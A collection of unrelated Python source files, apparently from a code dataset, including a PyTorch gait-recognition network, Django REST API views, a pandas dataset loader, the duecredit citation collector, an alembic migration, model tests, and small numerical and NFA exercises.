s_max = bu.Float(0.1, BC=True)
def run(self, update_progress=lambda t: t):
try:
self.get_response_i(update_progress)
except ValueError:
print('No convergence reached')
return
t = bu.Float(0)
t_max = bu.Float(1)
def reset(self):
self.reset_i()
ipw_view = bu.View(
bu.Item('s_max'),
bu.Item('n_s'),
bu.Item('s_x_1', editor=bu.FloatRangeEditor(low_name='s_min',high_name='s_max')),
bu.Item('s_y_1', editor=bu.FloatRangeEditor(low_name='s_min',high_name='s_max')),
bu.Item('n_steps'),
)
| StarcoderdataPython |
1671103 | <filename>model/network/MT3D.py
import torch
import torch.nn as nn
import numpy as np
from .basic_blocks import SetBlock, BasicConv2d, M3DPooling, FramePooling, FramePooling1, LocalTransform, BasicConv3DB, GMAP, SeparateFC
class MTNet(nn.Module):
def __init__(self, hidden_dim):
super(MTNet, self).__init__()
self.hidden_dim = hidden_dim
self.batch_frame = None
_set_in_channels = 1
_set_channels = [32, 64, 128, 128]
self.layer1 = nn.Conv3d(_set_in_channels, _set_channels[0], kernel_size=(3,3,3), stride=(2,1,1), padding=1,bias=False)
# Transform clip 每个clip分开卷
self.local_transform1 = LocalTransform(_set_channels[0], _set_channels[0],s=3)
self.B3D_layer2_S = BasicConv3DB(_set_channels[0], _set_channels[1], padding=1)
self.M3D_layer2_S = M3DPooling()
self.B3D_layer2_L = BasicConv3DB(_set_channels[0], _set_channels[1], padding=1)
self.M3D_layer2_L = M3DPooling()
self.local_transform2 = LocalTransform(_set_channels[1], _set_channels[1],s=3)
self.B3D_layer3_S1 = BasicConv3DB(_set_channels[1], _set_channels[2], padding=1)
self.B3D_layer3_S2 = BasicConv3DB(_set_channels[2], _set_channels[3], padding=1)
self.B3D_layer3_L1 = BasicConv3DB(_set_channels[1], _set_channels[2], padding=1)
self.B3D_layer3_L2 = BasicConv3DB(_set_channels[2], _set_channels[3], padding=1)
self.local_transform3 = LocalTransform(_set_channels[3], _set_channels[3],s=3)
self.framepooling_S = FramePooling1()
self.framepooling_L = FramePooling1()
self.gmap_S = GMAP(w=22)
self.gmap_L = GMAP(w=22)
self.fc_bin = nn.Parameter(
nn.init.xavier_uniform_(
torch.zeros(64, _set_channels[3], self.hidden_dim)))
for m in self.modules():
if isinstance(m, (nn.Conv2d, nn.Conv1d)):
nn.init.xavier_uniform_(m.weight.data)
elif isinstance(m, nn.Linear):
nn.init.xavier_uniform_(m.weight.data)
nn.init.constant(m.bias.data, 0.0)
elif isinstance(m, (nn.BatchNorm2d, nn.BatchNorm1d)):
nn.init.normal(m.weight.data, 1.0, 0.02)
nn.init.constant(m.bias.data, 0.0)
def forward(self, silho, batch_frame=None):
# n: batch_size, s: frame_num, k: keypoints_num, c: channel
if batch_frame is not None:
batch_frame = batch_frame[0].data.cpu().numpy().tolist()
_ = len(batch_frame)
for i in range(len(batch_frame)):
if batch_frame[-(i + 1)] != 0:
break
else:
_ -= 1
batch_frame = batch_frame[:_]
frame_sum = np.sum(batch_frame)
if frame_sum < silho.size(1):
silho = silho[:, :frame_sum, :, :]
self.batch_frame = [0] + np.cumsum(batch_frame).tolist()
n = silho.size(0)
x = silho.unsqueeze(2) #[12, 30, 1, 64, 44]
del silho
import pdb
# pdb.set_trace()
#layer1
x = self.layer1(x.permute(0,2,1,3,4).contiguous()) #output [12, 32, 15, 64, 44]
x1 = self.local_transform1(x) # [12, 32, 5, 64, 44]
#layer2
x = self.B3D_layer2_S(x) # [12, 64, 15, 64, 44]
x = self.M3D_layer2_S(x) # [12, 64, 15, 32, 22]
x1 = self.B3D_layer2_L(x1) # [12, 64, 5, 64, 44]
x1 = self.M3D_layer2_L(x1) # [12, 64, 5, 32, 22]
x1 = x1 + self.local_transform2(x) # [12, 64, 5, 32, 22]
#layer3
x = self.B3D_layer3_S1(x)
x = self.B3D_layer3_S2(x) # [12, 128, 15, 32, 22]
x1 = self.B3D_layer3_L1(x1)
x1 = self.B3D_layer3_L2(x1) # [12, 128, 5, 32, 22]
x1 = x1 + self.local_transform3(x) # [12, 128, 5, 32, 22]
#Framepooling & GAP GMP
x = self.framepooling_S(x) # [12, 128, 1, 32, 22]
x = self.gmap_S(x) # [12, 128, 1, 32, 1]
x1 = self.framepooling_L(x1)
x1 = self.gmap_L(x1)
#Separate FC
feature = torch.cat((x,x1),dim=3) # [12, 128, 1, 64, 1]
del x1
del x
# x = self.fc(x)
feature = feature.squeeze(-1) # [12, 128, 1, 64]
feature = feature.permute(0, 3, 2, 1).contiguous() # [12, 64, 1, 128]
feature = feature.matmul(self.fc_bin)
return feature.squeeze(2), None # [12, 64, 128] | StarcoderdataPython |
1900527 | <reponame>tommyjcarpenter/dev-bootstrap
from setuptools import setup, find_packages
setup(
name="bootstrap",
version="1.0.0",
packages=find_packages(),
author="<NAME>",
author_email="<EMAIL>",
description=("Dev env bootstrapping"),
license="MIT",
url="https://github.com/tommyjcarpenter/dev-bootstrap",
install_requires=["click", "jsonschema"],
scripts=["bin/runboot.py"],
)
| StarcoderdataPython |
6653586 | constants.physical_constants["kelvin-joule relationship"] | StarcoderdataPython |
8014368 | <filename>profiles_api/views.py
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status, viewsets, filters
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from rest_framework.permissions import IsAuthenticated
from . import serializers, models, permissions
class HelloAPIView(APIView):
"""Test API view"""
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Returns list of API View features"""
api_view = [
"Uses method (post, get, put, patch, delete)",
"Similar to traditional django view",
"Gives control over logic",
"Is mapped to URLs",
]
return Response({
"Message": "Hello",
"Api": api_view
})
def post(self, request):
"""Create Hello Message with Name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}'
return Response({
"message": message
})
else:
return Response(serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
def put(self, request, pk=None):
"""Handle updating an object"""
return Response({"message": "PUT"})
def patch(self, request, pk=None):
"""Handle partial updating an object"""
return Response({"message": "PATCH"})
def delete(self, request, pk=None):
"""Handle deleting an object"""
return Response({"message": "DELETE"})
class HelloViewSet(viewsets.ViewSet):
"""Test API View Set"""
serializer_class = serializers.HelloSerializer
def list(self, request):
"""Return Hello Message"""
a_view_set = [
'uses_action ,(List, Create, Retrieve, Update, Partial Update)',
'Automatically maps to URL using Routers',
'Provides more functionality with Less Code',
]
return Response({
"message": "Hello View Set",
"view_set": a_view_set,
})
def create(self, request):
"""Create a Hello Message"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
"""Handle getting an object by its ID"""
return Response({'http_method': 'GET'})
def update(self, request, pk=None):
"""Handle updating an object"""
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handle updating part of an object"""
return Response({'http_method': 'PATCH'})
def destroy(self, request, pk=None):
"""Handle removing an object"""
return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
"""Handle Creating and Updating Profiles"""
serializer_class = serializers.UserProfileSerializer
queryset = models.UserProfile.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (permissions.UpdateOwnProfile,)
filter_backends = (filters.SearchFilter,)
search_fields = ('name', 'email',)
class UserLoginAPI(ObtainAuthToken):
"""Handle User Authentication Token"""
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
"""Handles Creating, Reading & Updating of Profile Feed Item """
authentication_classes = (TokenAuthentication,)
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (permissions.UpdateOwnStatus, IsAuthenticated,)
def perform_create(self, serializer):
"""
Sets the Feed Item to Logged in User,
Called during HTTP POST
"""
serializer.save(user_profile=self.request.user) | StarcoderdataPython |
3341206 | import pandas as pd
from pathlib import Path
from bert_clf.src.pandas_dataset.BaseDataset import BaseDataset
import os
class PandasDataset(BaseDataset):
"""
Dataset class for datasets that have simple structure
"""
def __init__(self,
train_data_path: str,
test_data_path: str = None,
random_state: int = 42,
text_label: str = '',
target_label: str = '',
test_size: float = 0.3
):
self.valid_data_types = {
'.csv': self._read_csv,
'.tsv': self._read_csv,
'.xls': self._read_excel,
'.xlsx': self._read_excel,
'.json': self._read_json,
'.jsonl': self._read_json
}
super(PandasDataset, self).__init__(
train_data_path=train_data_path,
test_data_path=test_data_path,
random_state=random_state,
text_label=text_label,
target_label=target_label,
test_size=test_size
)
def read_data(self, path: Path) -> pd.DataFrame:
"""
Given the path to the file returns extension of that file
Example:
path: "../input/some_data.csv"
:return: ".csv"
"""
_, extension = os.path.splitext(path)
if extension.lower() in self.valid_data_types:
return self.valid_data_types[extension](path=path, extension=extension)
else:
raise ValueError(f"Your data type ({extension}) is not supported, please convert your dataset "
f"to one of the following formats {list(self.valid_data_types.keys())}.")
@staticmethod
def _read_csv(path: Path, extension: str) -> pd.DataFrame:
"""
Reads a csv file given its path
:param path: Path("../../some_file.csv")
:return: dataframe
"""
sep = ','
if extension == '.tsv':
sep = '\t'
return pd.read_csv(filepath_or_buffer=path, sep=sep, encoding="utf-8")
@staticmethod
def _read_excel(path: Path, extension: str) -> pd.DataFrame:
"""
Reads a xls or xlsx file given its path
:param path: Path("../../some_file.xlsx")
:return: dataframe
"""
engine = 'openpyxl'
if extension == '.xls':
engine = None
return pd.read_excel(io=path, engine=engine)
@staticmethod
def _read_json(path: Path, extension: str) -> pd.DataFrame:
"""
Reads a json or jsonl file given its path
:param path: Path("../../some_file.jsonl")
:return: dataframe
"""
lines = False
if extension == '.jsonl':
lines = True
return pd.read_json(path_or_buf=path, lines=lines, encoding="utf-8")
| StarcoderdataPython |
4898579 | <reponame>yarikoptic/duecredit
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the duecredit package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Citation and citations Collector classes"""
import os
import sys
from functools import wraps
from six import iteritems, itervalues
from .config import DUECREDIT_FILE
from .entries import DueCreditEntry
from .stub import InactiveDueCreditCollector
from .io import TextOutput, PickleOutput
from .utils import never_fail, borrowdoc
from .versions import external_versions
from collections import namedtuple
import logging
lgr = logging.getLogger('duecredit.collector')
CitationKey = namedtuple('CitationKey', ['path', 'entry_key'])
class Citation(object):
"""Encapsulates citations and information on their use"""
def __init__(self, entry, description=None, path=None, version=None,
cite_module=False, tags=['implementation']):
"""Cite a reference
Parameters
----------
entry: str or DueCreditEntry
The entry to use, either identified by its id or a new one (to be added)
description: str, optional
Description of what this functionality provides
path: str
Path to the object which this citation associated with. Format is
"module[.submodules][:[class.]method]", i.e. ":" is used to separate module
path from the path within the module.
version: str or tuple, version
Version of the beast (e.g. of the module) where applicable
cite_module: bool, optional
If it is a module citation, setting it to True would make that module citeable
even without internal duecredited functionality invoked. Should be used only for
core packages whenever it is reasonable to assume that its import constitute
its use (e.g. numpy)
tags: list of str, optional
Tags to associate with the given code/reference combination. Some tags have
associated semantics in duecredit, e.g.
- "implementation" [default] tag describes as an implementation of the cited
method
- "reference-implementation" tag describes as the original implementation (ideally
by the authors of the paper) of the cited method
- "another-implementation" tag describes some other implementation of the method
- "use" tag points to publications demonstrating a worthwhile noting use
the method
- "edu" references to tutorials, textbooks and other materials useful to learn
more
- "donate" should be commonly used with Url entries to point to the websites
describing how to contribute some funds to the referenced project
"""
if path is None:
raise ValueError('Must specify path')
self._entry = entry
self._description = description
# We might want extract all the relevant functionality into a separate class
self._path = path
self._cite_module = cite_module
self.tags = tags or []
self.version = version
self.count = 0
def __repr__(self):
args = [repr(self._entry)]
if self._description:
args.append("description={0}".format(repr(self._description)))
if self._path:
args.append("path={0}".format(repr(self._path)))
if self._cite_module:
args.append("cite_module={0}".format(repr(self._cite_module)))
if args:
args = ", ".join(args)
else:
args = ""
return self.__class__.__name__ + '({0})'.format(args)
@property
def path(self):
return self._path
@property
def cite_module(self):
return self._cite_module
@path.setter
def path(self, path):
# TODO: verify value, if we are not up for it -- just make _path public
self._path = path
@property
def entry(self):
return self._entry
@property
def description(self):
return self._description
@property
def cites_module(self):
if not self.path:
return None
return not (':' in self.path)
@property
def module(self):
if not self.path:
return None
return self.path.split(':', 1)[0]
@property
def package(self):
module = self.module
if not module:
return None
return module.split('.', 1)[0]
@property
def objname(self):
if not self.path:
return None
spl = self.path.split(':', 1)
if len(spl) > 1:
return spl[1]
else:
return None
def __contains__(self, entry):
"""Checks if provided entry 'contained' in this one given its path
If current entry is associated with a module, contained will be an entry
of
- the same module
- submodule of the current module or function within
If current entry is associated with a specific function/class, it can contain
another entry if it really contains it as an attribute
"""
if self.cites_module:
return ((self.path == entry.path) or
(entry.path.startswith(self.path + '.')) or
(entry.path.startswith(self.path + ':')))
else:
return entry.path.startswith(self.path + '.')
@property
def key(self):
return CitationKey(self.path, self.entry.key)
@staticmethod
def get_key(path, entry_key):
return CitationKey(path, entry_key)
def set_entry(self, newentry):
self._entry = newentry
class DueCreditCollector(object):
"""Collect the references
The mighty beast which will might become later a proxy on the way to
talk to a real collector
Parameters
----------
entries : list of DueCreditEntry, optional
List of reference items (BibTeX, Doi, etc) known to the collector
citations : list of Citation, optional
List of citations -- associations between references and particular
code, with a description for its use, tags etc
"""
# TODO? rename "entries" to "references"? or "references" is closer to "citations"
def __init__(self, entries=None, citations=None):
self._entries = entries or {}
self.citations = citations or {}
@never_fail
def add(self, entry):
"""entry should be a DueCreditEntry object"""
if isinstance(entry, list):
for e in entry:
self.add(e)
else:
key = entry.get_key()
self._entries[key] = entry
lgr.log(1, "Collector added entry %s", key)
@never_fail
def load(self, src):
"""Loads references from a file or other recognizable source
ATM supported only
- .bib files
"""
# raise NotImplementedError
if isinstance(src, str):
if src.endswith('.bib'):
self._load_bib(src)
else:
raise NotImplementedError('Format not yet supported')
else:
raise ValueError('Must be a string')
def _load_bib(self, src):
lgr.debug("Loading %s" % src)
# # TODO: figure out what would be the optimal use for the __call__
# def __call__(self, *args, **kwargs):
# # TODO: how to determine and cite originating module???
# # - we could use inspect but many people complain
# # that it might not work with other Python
# # implementations
# pass # raise NotImplementedError
@never_fail
@borrowdoc(Citation, "__init__")
def cite(self, entry, **kwargs):
# TODO: if cite is invoked but no path is provided -- we must figure it out
# I guess from traceback, otherwise how would we know later to associate it
# with modules???
path = kwargs.get('path', None)
if path is None:
raise ValueError('path must be provided')
if isinstance(entry, DueCreditEntry):
# new one -- add it
self.add(entry)
entry_ = self._entries[entry.get_key()]
else:
entry_ = self._entries[entry]
entry_key = entry_.get_key()
citation_key = Citation.get_key(path=path, entry_key=entry_key)
try:
citation = self.citations[citation_key]
except KeyError:
self.citations[citation_key] = citation = Citation(entry_, **kwargs)
assert(citation.key == citation_key)
# update citation count
citation.count += 1
# TODO: theoretically version shouldn't differ if we don't preload previous results
if not citation.version:
version = kwargs.get('version', None)
if not version and citation.path:
modname = citation.path.split('.', 1)[0]
if '.' in modname:
package = modname.split('.', 1)[0]
else:
package = modname
# package_loaded = sys.modules.get(package)
# if package_loaded:
# # find the citation for that module
# for citation in itervalues(self.citations):
# if citation.package == package \
# and not citation.version:
version = external_versions[package]
citation.version = version
return citation
def _citations_fromentrykey(self):
"""Return a dictionary with the current citations indexed by the entry key"""
citations_key = dict()
for (path, entry_key), citation in iteritems(self.citations):
if entry_key not in citations_key:
citations_key[entry_key] = citation
return citations_key
@staticmethod
def _args_match_conditions(conditions, *fargs, **fkwargs):
"""Helper to identify when to trigger citation given parameters to the function call
"""
for (argpos, kwarg), values in iteritems(conditions):
# main logic -- assess default and if get to the next one if
# given argument is not present
if not ((len(fargs) > argpos) or (kwarg in fkwargs)):
if not ('DC_DEFAULT' in values):
# if value was specified but not provided and not default
# conditions are not satisfied
return False
continue
# "extract" the value. Must be defined here
value = "__duecredit_magical_undefined__"
if len(fargs) > argpos:
value = fargs[argpos]
if kwarg in fkwargs:
value = fkwargs[kwarg]
assert(value != "__duecredit_magical_undefined__")
if '.' in kwarg:
# we were requested to condition based on the value of the attribute
# of the value. So get to the attribute(s) value
for attr in kwarg.split('.')[1:]:
value = getattr(value, attr)
# Value is present but not matching
if not (value in values):
return False
# if checks passed -- we must have matched conditions
return True
@never_fail
@borrowdoc(Citation, "__init__", replace="PLUGDOCSTRING")
def dcite(self, *args, **kwargs):
"""Decorator for references. PLUGDOCSTRING
Parameters
----------
conditions: dict, optional
If reference should be cited whenever parameters to the function call
satisfy given values (all of the specified).
Each key in the dictionary is a 2 element tuple with first element, integer,
pointing to a position of the argument in the original function call signature,
while second provides the name, thus if used as a keyword argument.
Use "DC_DEFAULT" keyword as a value to depict default value (e.g. if no
explicit value was provided for that positional or keyword argument).
If "keyword argument" is of the form "obj.attr1.attr2", then actual value
for comparison would be taken by extracting attr1 (and then attr2) attributes
from the provided value. So, if desired to condition of the state of the object,
you can use `(0, "self.attr1") : {...values...}`
Examples
--------
>>> from duecredit import due
>>> @due.dcite('XXX00', description="Provides an answer for meaningless existence")
... def purpose_of_life():
... return None
Conditional citation given argument to the function
>>> @due.dcite('XXX00', description="Relief through the movement",
... conditions={(1, 'method'): {'purge', 'DC_DEFAULT'}})
... @due.dcite('XXX01', description="Relief through the drug treatment",
... conditions={(1, 'method'): {'drug'}})
... def relief(x, method='purge'):
... if method == 'purge': return "crap"
... elif method == 'drug': return "swallow"
>>> relief("doesn't matter")
'crap'
Conditional based on the state of the object
>>> class Citeable(object):
... def __init__(self, param=None):
... self.param = param
... @due.dcite('XXX00', description="The same good old relief",
... conditions={(0, 'self.param'): {'magic'}})
... def __call__(self, data):
... return sum(data)
>>> Citeable('magic')([1, 2])
3
"""
def func_wrapper(func):
conditions = kwargs.pop('conditions', {})
path = kwargs.get('path', None)
if not path:
# deduce path from the actual function which was decorated
# TODO: must include class name but can't !!!???
modname = func.__module__
path = kwargs['path'] = '%s:%s' % (modname, func.__name__)
else:
# TODO: we indeed need to separate path logic outside
modname = path.split(':', 1)[0]
# if decorated function was invoked, it means that we need
# to cite that even if it is a module. But do not override
# value if user explicitly stated
if 'cite_module' not in kwargs:
kwargs['cite_module'] = True
# TODO: might make use of inspect.getmro
# see e.g.
# http://stackoverflow.com/questions/961048/get-class-that-defined-method
lgr.debug("Decorating func %s within module %s" % (func.__name__, modname))
# TODO: unittest for all the __version__ madness
# TODO: check if we better use wrapt module which provides superior "correctness"
# of decorating. vcrpy uses wrapt, and that thing seems to wrap
@wraps(func)
def cite_wrapper(*fargs, **fkwargs):
try:
if not conditions \
or self._args_match_conditions(conditions, *fargs, **fkwargs):
citation = self.cite(*args, **kwargs)
except Exception as e:
lgr.warning("Failed to cite due to %s" % (e,))
return func(*fargs, **fkwargs)
cite_wrapper.__duecredited__ = func
return cite_wrapper
return func_wrapper
@never_fail
def __repr__(self):
args = []
if self.citations:
args.append("citations={0}".format(repr(self.citations)))
if self._entries:
args.append("entries={0}".format(repr(self._entries)))
if args:
args = ", ".join(args)
else:
args = ""
return self.__class__.__name__ + '({0})'.format(args)
@never_fail
def __str__(self):
return self.__class__.__name__ + \
' {0:d} entries, {1:d} citations'.format(
len(self._entries), len(self.citations))
# TODO: redo heavily -- got very messy
class CollectorSummary(object):
"""A helper which would take care about exporting citations upon its Death
"""
def __init__(self, collector, outputs="stdout,pickle", fn=DUECREDIT_FILE):
self._due = collector
self.fn = fn
# for now decide on output "format" right here
self._outputs = [
self._get_output_handler(
type_.lower().strip(), collector, fn=fn)
for type_ in os.environ.get('DUECREDIT_OUTPUTS', outputs).split(',')
if type_
]
@staticmethod
def _get_output_handler(type_, collector, fn=None):
# just a little factory
if type_ in ("stdout", "stderr"):
return TextOutput(getattr(sys, type_), collector)
elif type_ == "pickle":
return PickleOutput(collector, fn=fn)
else:
raise NotImplementedError()
def dump(self):
for output in self._outputs:
output.dump()
# TODO: provide HTML, MD, RST etc formattings
| StarcoderdataPython |
6489861 | <reponame>Xrenya/algorithms
digit = input()
def digit_sum(digit):
return sum([(int(x)) for x in digit])
print(digit_sum(digit))
| StarcoderdataPython |
5060142 | """Add new table for PasswordReset model.
Revision ID: 32839e658194
Revises: <PASSWORD>
Create Date: 2017-11-13 08:12:28.990037
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import sqlalchemy as sa
from alembic import op
# Revision identifiers, used by Alembic.
revision = '32839e658194'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
"""Create 'password_resets' table."""
op.create_table(
'password_resets',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('code', sa.String(length=32), nullable=False),
sa.Column('is_active', sa.Boolean(), nullable=False),
sa.Column('expires_at', sa.DateTime(), nullable=False),
sa.Column('modified_at', sa.DateTime(), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('code')
)
def downgrade():
"""Drop 'password_resets' table."""
op.drop_table('password_resets')
| StarcoderdataPython |
5139881 | <reponame>metabolize-forks/booby<gh_stars>0
# -*- coding: utf-8 -*-
from expects import *
from booby import fields, models
IRRELEVANT_NAME = 'irrelevant name'
IRRELEVANT_EMAIL = 'irrelevant email'
ENCODED_IRRELEVANT_NAME = 'encoded irrelevant name'
ENCODED_IRRELEVANT_EMAIL = 'encoded irrelevant email'
IRRELEVANT_DATE = 'irrelevant date'
class TestEncodeModel(object):
def test_should_use_value_returned_by_field_encode_method(self):
class User(models.Model):
name = StubField(encoded=ENCODED_IRRELEVANT_NAME)
email = StubField(encoded=ENCODED_IRRELEVANT_EMAIL)
user = User(name=IRRELEVANT_NAME, email=IRRELEVANT_EMAIL)
result = user.encode()
expect(result).to(have_keys(name=ENCODED_IRRELEVANT_NAME,
email=ENCODED_IRRELEVANT_EMAIL))
def test_should_return_dict_with_model_mapped_fields(self):
class User(models.Model):
name = fields.Field(name='username')
email = fields.Field(name='emailAddress')
user = User(name=IRRELEVANT_NAME, email=IRRELEVANT_EMAIL)
result = user.encode()
expect(result).to(have_keys(username=IRRELEVANT_NAME,
emailAddress=IRRELEVANT_EMAIL))
def test_should_skip_read_only_field(self):
class User(models.Model):
name = fields.Field()
last_update = fields.Field(read_only=True)
user = User(name=IRRELEVANT_NAME, last_update=IRRELEVANT_DATE)
result = user.encode()
expect(result).to(have_keys(name=IRRELEVANT_NAME))
expect(result).not_to(have_keys(last_update=IRRELEVANT_DATE))
class StubField(fields.Field):
def encode(self, value):
return self.options['encoded']
| StarcoderdataPython |
1826416 | <reponame>rsdoherty/azure-sdk-for-python<filename>sdk/cognitiveservices/azure-cognitiveservices-search-websearch/azure/cognitiveservices/search/websearch/models/__init__.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import Answer
from ._models_py3 import Article
from ._models_py3 import Computation
from ._models_py3 import CreativeWork
from ._models_py3 import Error
from ._models_py3 import ErrorResponse, ErrorResponseException
from ._models_py3 import Identifiable
from ._models_py3 import ImageObject
from ._models_py3 import Images
from ._models_py3 import Intangible
from ._models_py3 import MediaObject
from ._models_py3 import News
from ._models_py3 import NewsArticle
from ._models_py3 import Places
from ._models_py3 import Query
from ._models_py3 import QueryContext
from ._models_py3 import RankingRankingGroup
from ._models_py3 import RankingRankingItem
from ._models_py3 import RankingRankingResponse
from ._models_py3 import RelatedSearchesRelatedSearchAnswer
from ._models_py3 import Response
from ._models_py3 import ResponseBase
from ._models_py3 import SearchResponse
from ._models_py3 import SearchResultsAnswer
from ._models_py3 import SpellSuggestions
from ._models_py3 import StructuredValue
from ._models_py3 import Thing
from ._models_py3 import TimeZone
from ._models_py3 import TimeZoneTimeZoneInformation
from ._models_py3 import VideoObject
from ._models_py3 import Videos
from ._models_py3 import WebMetaTag
from ._models_py3 import WebPage
from ._models_py3 import WebWebAnswer
from ._models_py3 import WebWebGrouping
except (SyntaxError, ImportError):
from ._models import Answer
from ._models import Article
from ._models import Computation
from ._models import CreativeWork
from ._models import Error
from ._models import ErrorResponse, ErrorResponseException
from ._models import Identifiable
from ._models import ImageObject
from ._models import Images
from ._models import Intangible
from ._models import MediaObject
from ._models import News
from ._models import NewsArticle
from ._models import Places
from ._models import Query
from ._models import QueryContext
from ._models import RankingRankingGroup
from ._models import RankingRankingItem
from ._models import RankingRankingResponse
from ._models import RelatedSearchesRelatedSearchAnswer
from ._models import Response
from ._models import ResponseBase
from ._models import SearchResponse
from ._models import SearchResultsAnswer
from ._models import SpellSuggestions
from ._models import StructuredValue
from ._models import Thing
from ._models import TimeZone
from ._models import TimeZoneTimeZoneInformation
from ._models import VideoObject
from ._models import Videos
from ._models import WebMetaTag
from ._models import WebPage
from ._models import WebWebAnswer
from ._models import WebWebGrouping
from ._web_search_client_enums import (
AnswerType,
ErrorCode,
ErrorSubCode,
Freshness,
SafeSearch,
TextFormat,
)
__all__ = [
'Answer',
'Article',
'Computation',
'CreativeWork',
'Error',
'ErrorResponse', 'ErrorResponseException',
'Identifiable',
'ImageObject',
'Images',
'Intangible',
'MediaObject',
'News',
'NewsArticle',
'Places',
'Query',
'QueryContext',
'RankingRankingGroup',
'RankingRankingItem',
'RankingRankingResponse',
'RelatedSearchesRelatedSearchAnswer',
'Response',
'ResponseBase',
'SearchResponse',
'SearchResultsAnswer',
'SpellSuggestions',
'StructuredValue',
'Thing',
'TimeZone',
'TimeZoneTimeZoneInformation',
'VideoObject',
'Videos',
'WebMetaTag',
'WebPage',
'WebWebAnswer',
'WebWebGrouping',
'AnswerType',
'ErrorCode',
'ErrorSubCode',
'Freshness',
'SafeSearch',
'TextFormat',
]
| StarcoderdataPython |
11344022 | # Exercise 3.17
# Author: <NAME>
from scipy.integrate import quad
from scipy import exp, pi, cos, log, sqrt
def diff2(f, x, h=1E-6):
r = (f(x - h) - 2 * f(x) + f(x + h)) / (h ** 2)
return r
def adaptive_trapezint(f, a, b, eps=1E-4):
ddf = []
for i in range(101):
ddf.append(abs(diff2(f, a + i * (b - a) / 100)))
max_ddf = max(ddf)
h = sqrt(12 * eps) * 1 / sqrt((b - a) * max_ddf)
n = (b - a) / h
s = (f(a) + f(b)) / 2
for i in range(1, int(n)):
s += f(a + i * h)
s *= h
return s
f1 = [exp, 0, log(3)]
f2 = (cos, 0, pi)
functions = [f1, f2]
def verify(f, a, b, n):
exact = quad(f, a, b)[0]
approx = adaptive_trapezint(f, a, b)
error = abs(exact - approx)
print 'The exact integral of %s between %.5f and %.5f is %.5f.\
The approximate answer is %.5f giving an error of %.5f' \
% (f.__name__, a, b, exact, approx, error)
for f in functions:
verify(f[0], f[1], f[2], 10)
"""
Sample run:
python adaptive_trapezint.py
The exact integral of exp between 0.00000 and 1.09861 is 2.00000. The approximate answer is 1.96771 giving an error of 0.03229
The exact integral of cos between 0.00000 and 3.14159 is 0.00000. The approximate answer is 0.01467 giving an error of 0.01467
"""
| StarcoderdataPython |
9767394 | import sys
from random import randrange, uniform
from collections import OrderedDict as od
def visitNFA(table, input_, accepting_states):
number_of_states = len(table)
active_states = [1] + ([0] * number_of_states)
for char in input_:
temp = [0] * number_of_states
next_states = []
for i, state in enumerate(active_states):
if state:
for j in table[i][char]:
next_states.append(j)
for k in next_states:
temp[k] = 1
active_states = temp
for s in accepting_states:
if active_states[s]:
return True
return False
def createArray(alphabet, n):
return [ [ [( remainder * 10 + letter ) % n] for letter in alphabet ] for remainder in range(n) ]
def makeNFA(dfa_1, dfa_2):
# possible accepting state because the second dfa accepts at this state, as it is the first state for the second dfa
next_state_value = len(dfa_1)
nfa = [0] * next_state_value
for state, next_state_sets in enumerate(dfa_1):
nfa[state] = next_state_sets
for i, next_states in enumerate(next_state_sets):
nfa[state][i].append(state + next_state_value)
new_dfa = [0] * next_state_value
for state, next_state_sets in enumerate(dfa_2):
new_dfa[state] = []
for i, next_states in enumerate(next_state_sets):
new_dfa[state].append([dfa_2[state][i][0] + next_state_value])
for state, next_state_sets in enumerate(new_dfa):
nfa.append(next_state_sets)
return nfa, [next_state_value, 0]
def makeDFAs(alphabet, n):
return createArray(alphabet, n), createArray(alphabet, n)
def convertToList(number_as_string):
return [int(i) for i in number_as_string]
# only accept strings strongly divisible by n
# rejects strings not strongly divisible by n
def stronglyNotDivisible(nfa, string, accepting_states):
return not visitNFA(nfa, string, accepting_states)
def checkGoodValues(irand, mod_val):
j = 0
while True:
if irand % mod_val == 0:
string_test = str(irand)
strings = []
for i, a in enumerate(string_test):
if int(string_test[0:i] + string_test[i+1:]) % mod_val == 0:
strings.append(string_test[0:i] + string_test[i+1:])
if len(strings) >= 50:
break
irand = randrange(0, 10000000000000000000000000000000000000000000000000000000000000000000000000000)
j += 1
def checkBadValues(irand, mod_val):
j = 0
while True:
if j == 5:
exit()
if irand % mod_val != 0:
string_test = str(irand)
strings = []
for i, a in enumerate(string_test):
if int(string_test[0:i] + string_test[i+1:]) % mod_val != 0:
strings.append(string_test[0:i] + string_test[i+1:])
irand = randrange(0, 10000000000000000000000000000000000000000000000000000000000000000000000000000)
j += 1
def makeStrongDivisibleKIsFourDigits(k):
